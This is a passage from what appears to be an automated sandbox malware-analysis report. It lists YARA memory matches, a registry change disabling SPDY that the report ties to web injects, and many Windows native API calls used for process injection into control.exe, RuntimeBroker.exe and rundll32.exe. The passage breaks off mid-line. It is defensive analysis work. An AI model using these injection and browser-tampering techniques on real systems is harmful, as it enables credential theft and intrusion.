            Source: Yara matchFile source: 00000013.00000002.522755619.00000209AC2FE000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000012.00000002.517273207.000001E76685E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000003.322573537.0000000004F20000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001F.00000002.502120858.000000000480D000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000019.00000002.490824875.000002EEDF87E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 4448, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: control.exe PID: 7096, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 3472, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: control.exe PID: 7116, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 4016, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 5848, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 4540, type: MEMORY
            Disables SPDY (HTTP compression, likely to perform web injects)Show sources
            Source: C:\Windows\explorer.exeRegistry key value created / modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings EnableSPDY3_0 0Jump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_03174459 memcpy,LdrInitializeThunk,memcpy,memcpy,NtUnmapViewOfSection,RtlNtStatusToDosError,FindCloseChangeNotification,memset,3_2_03174459
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_03173D76 NtMapViewOfSection,RtlNtStatusToDosError,3_2_03173D76
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_03171071 NtCreateSection,memset,RtlNtStatusToDosError,NtClose,3_2_03171071
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_03172892 NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError,3_2_03172892
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_03171288 LdrInitializeThunk,GetProcAddress,NtWow64ReadVirtualMemory64,3_2_03171288
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_031713A6 GetModuleHandleA,GetModuleHandleA,NtGetContextThread,NtGetContextThread,LdrInitializeThunk,3_2_031713A6
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_031732A8 NtQuerySystemInformation,RtlNtStatusToDosError,3_2_031732A8
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_031712DC NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtClose,NtClose,3_2_031712DC
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_031718F2 NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError,3_2_031718F2
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0317553C NtGetContextThread,3_2_0317553C
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_03175269 memset,LdrInitializeThunk,NtQueryInformationProcess,3_2_03175269
            Source: C:\Windows\System32\control.exeCode function: 13_2_0027E25C NtMapViewOfSection,13_2_0027E25C
            Source: C:\Windows\System32\control.exeCode function: 13_2_0027E36C NtAllocateVirtualMemory,13_2_0027E36C
            Source: C:\Windows\System32\control.exeCode function: 13_2_00293C40 NtQueryInformationToken,NtQueryInformationToken,NtClose,13_2_00293C40
            Source: C:\Windows\System32\control.exeCode function: 13_2_00277CF4 RtlAllocateHeap,NtCreateSection,NtUnmapViewOfSection,FindCloseChangeNotification,13_2_00277CF4
            Source: C:\Windows\System32\control.exeCode function: 13_2_00280570 NtSetContextThread,13_2_00280570
            Source: C:\Windows\System32\control.exeCode function: 13_2_0027B5BC NtReadVirtualMemory,13_2_0027B5BC
            Source: C:\Windows\System32\control.exeCode function: 13_2_0029AEAC NtWriteVirtualMemory,13_2_0029AEAC
            Source: C:\Windows\System32\control.exeCode function: 13_2_0029D6AC NtQueryInformationProcess,13_2_0029D6AC
            Source: C:\Windows\System32\control.exeCode function: 13_2_00292F88 NtQueryInformationProcess,13_2_00292F88
            Source: C:\Windows\System32\control.exeCode function: 13_2_002B1004 NtProtectVirtualMemory,NtProtectVirtualMemory,13_2_002B1004
            Source: C:\Windows\System32\control.exeCode function: 14_2_007AE25C NtMapViewOfSection,14_2_007AE25C
            Source: C:\Windows\System32\control.exeCode function: 14_2_007AE36C NtAllocateVirtualMemory,14_2_007AE36C
            Source: C:\Windows\System32\control.exeCode function: 14_2_007C3C40 NtQueryInformationToken,NtQueryInformationToken,NtClose,14_2_007C3C40
            Source: C:\Windows\System32\control.exeCode function: 14_2_007A7CF4 RtlAllocateHeap,NtCreateSection,NtUnmapViewOfSection,FindCloseChangeNotification,14_2_007A7CF4
            Source: C:\Windows\System32\control.exeCode function: 14_2_007B0570 NtSetContextThread,14_2_007B0570
            Source: C:\Windows\System32\control.exeCode function: 14_2_007AB5BC NtReadVirtualMemory,14_2_007AB5BC
            Source: C:\Windows\System32\control.exeCode function: 14_2_007CAEAC NtWriteVirtualMemory,14_2_007CAEAC
            Source: C:\Windows\System32\control.exeCode function: 14_2_007CD6AC NtQueryInformationProcess,14_2_007CD6AC
            Source: C:\Windows\System32\control.exeCode function: 14_2_007C2F88 NtQueryInformationProcess,14_2_007C2F88
            Source: C:\Windows\System32\control.exeCode function: 14_2_007E1041 NtProtectVirtualMemory,NtProtectVirtualMemory,14_2_007E1041
            Source: C:\Windows\System32\RuntimeBroker.exeCode function: 16_2_000002413CB2D6AC NtQueryInformationProcess,16_2_000002413CB2D6AC
            Source: C:\Windows\System32\RuntimeBroker.exeCode function: 16_2_000002413CB23C40 NtQueryInformationToken,NtQueryInformationToken,16_2_000002413CB23C40
            Source: C:\Windows\System32\rundll32.exeCode function: 17_2_000001EA04133C40 NtQueryInformationToken,NtQueryInformationToken,NtClose,17_2_000001EA04133C40
            Source: C:\Windows\System32\rundll32.exeCode function: 17_2_000001EA0413D6AC NtQueryInformationProcess,17_2_000001EA0413D6AC
            Source: C:\Windows\System32\rundll32.exeCode function: 17_2_000001EA0415104B NtProtectVirtualMemory,NtProtectVirtualMemory,17_2_000001EA0415104B
            Source: C:\Windows\System32\RuntimeBroker.exeCode function: 18_2_000001E766783C40 NtQueryInformationToken,NtQueryInformationToken,18_2_000001E766783C40
            Source: C:\Windows\System32\RuntimeBroker.exeCode function: 18_2_000001E76678D6AC NtQueryInformationProcess,18_2_000001E76678D6AC
            Source: C:\Windows\System32\RuntimeBroker.exeCode function: 19_2_00000209AC2ED6AC NtQueryInformationProcess,19_2_00000209AC2ED6AC
            Source: C:\Windows\System32\RuntimeBroker.exeCode function: 19_2_00000209AC2E3C40 NtQueryInformationToken,NtQueryInformationToken,19_2_00000209AC2E3C40
            Source: C:\Windows\System32\RuntimeBroker.exeCode function: 21_2_000001598A09D6AC NtQueryInformationProcess,21_2_000001598A09D6AC
            Source: C:\Windows\System32\RuntimeBroker.exeCode function: 21_2_000001598A093C40 NtQueryInformationToken,NtQueryInformationToken,21_2_000001598A093C40
            Source: C:\Windows\System32\RuntimeBroker.exeCode function: 22_2_000001F9FF95D6AC NtQueryInformationProcess,22_2_000001F9FF95D6AC
            Source: C:\Windows\System32\RuntimeBroker.exeCode function: 22_2_000001F9FF953C40 NtQueryInformationToken,NtQueryInformationToken,22_2_000001F9FF953C40
            Source: C:\Windows\System32\rundll32.exeCode function: 25_2_000002EEDF847CF4 NtCreateSection,NtUnmapViewOfSection,FindCloseChangeNotification,RtlDeleteBoundaryDescriptor,25_2_000002EEDF847CF4
            Source: C:\Windows\System32\rundll32.exeCode function: 25_2_000002EEDF863C40 NtQueryInformationToken,NtQueryInformationToken,NtClose,25_2_000002EEDF863C40
            Source: C:\Windows\System32\rundll32.exeCode function: 25_2_000002EEDF84E36C NtAllocateVirtualMemory,25_2_000002EEDF84E36C
            Source: C:\Windows\System32\rundll32.exeCode function: 25_2_000002EEDF84E25C NtMapViewOfSection,25_2_000002EEDF84E25C
            Source: C:\Windows\System32\rundll32.exeCode function: 25_2_000002EEDF846808 NtQueryInformationProcess,25_2_000002EEDF846808
            Source: C:\Windows\System32\rundll32.exeCode function: 25_2_000002EEDF862F88 NtQueryInformationProcess,25_2_000002EEDF862F88
            Source: C:\Windows\System32\rundll32.exeCode function: 25_2_000002EEDF86D6AC NtQueryInformation